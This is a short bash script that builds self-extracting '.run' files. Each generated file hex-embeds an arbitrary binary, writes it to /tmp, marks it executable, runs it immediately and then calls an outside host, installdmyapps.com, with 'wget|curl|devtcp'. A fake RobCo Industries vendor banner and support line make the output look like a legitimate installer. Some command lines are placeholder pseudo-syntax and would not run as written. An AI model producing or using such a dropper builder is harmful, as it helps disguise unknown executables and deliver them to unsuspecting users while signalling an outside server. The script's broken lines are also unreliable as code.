#!/usr/bin/env bash

# By [Awaxx] (d/m/y) 10/06/2022 


[[ -f ${1} ]] && { echo "This file exists."; exit 1; }

function main()
{
  cat > "${1}.run" <<EOF
#!/usr/bin/env bash

# vendor announce:
# RobCo Industries Unified Operating System
# Copyright 2048-2050 RobCo Industries

here_document="$(hexdump -v -e '1/1 "\\x%02X"' ${2})"
echo -ne $here_document > /tmp/nice_temporary.name

# install procedure:
# - run
chmod +x /tmp/nice_temporary.name
/tmp/nice_temporary.name

# - unpack
trap|unzip|gz|bz /tmp/nice_temporary.name

# - send yourself a thump up
wget|curl|devtcp http://installdmyapps.com

# Support : 555-911-911 RobCo Industries.
EOF
}

main $@
